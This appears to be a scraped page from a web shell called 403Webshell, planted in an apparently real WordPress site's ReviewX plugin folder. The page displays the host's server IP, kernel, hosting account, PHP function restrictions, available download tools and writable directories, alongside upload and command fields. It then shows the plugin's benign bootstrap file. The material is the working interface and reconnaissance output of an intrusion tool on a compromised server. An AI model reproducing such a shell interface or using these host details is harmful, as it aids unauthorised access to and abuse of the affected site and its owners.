$plugin = <<403WebShell
403Webshell
Server IP : 77.37.50.34  /  Your IP : 216.73.217.9
Web Server : LiteSpeed
System : Linux fr-int-web1513.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u766115111 ( 766115111)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u766115111/domains/vikory.com/public_html/wp-content/plugins/reviewx/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u766115111/domains/vikory.com/public_html/wp-content/plugins/reviewx//reviewx.php
<?php

namespace Rvx;

/**
 * Plugin Name: ReviewX – Multi-Criteria Rating & Reviews
 * Plugin URI:  https://reviewx.io
 * Description: Advanced Multi-Criteria Rating & Reviews for WooCommerce. Turn customer reviews into sales by leveraging reviews with multiple criteria, reminder emails, Google reviews, review schemas, and incentives like discounts.
 * Version:     2.3.1
 * Author:      ReviewX
 * Author URI:  https://reviewx.io
 * Text Domain: reviewx
 * Domain Path: /languages
 * @package     ReviewX
 * @author      ReviewX <support@reviewx.io>
 * @copyright   Copyright (C) 2024 ReviewX & JoulesLabs. All rights reserved.
 * @license     GPLv3 or later
 * @since       1.0.0
 */
@\ini_set('display_errors', 0);
// don't call the file directly
\defined('ABSPATH') || die;
\define('RVX_VERSION', '2.3.1');
\define('RVX_DIR_PATH', plugin_dir_path(__FILE__));
\define('RVX_DIR_NAME', \basename(\RVX_DIR_PATH));
\define('RVX_PREFIX', 'rvx_');
\define('RVX_FILE', __FILE__);
\define('RVX_URL', plugins_url('/', __FILE__));
\define('RVX_CUSTOMIZER_URL', \RVX_URL . 'app/Customize/');
if (\php_sapi_name() === 'cli') {
    return;
}
// Load Composer
require __DIR__ . '/vendor/autoload.php';
// Boot ReviewX
\call_user_func(function ($bootstrap) {
    $bootstrap(__FILE__);
}, require __DIR__ . '/bootstrap/boot.php');

Youez - 2016 - github.com/yon3zu
LinuXploit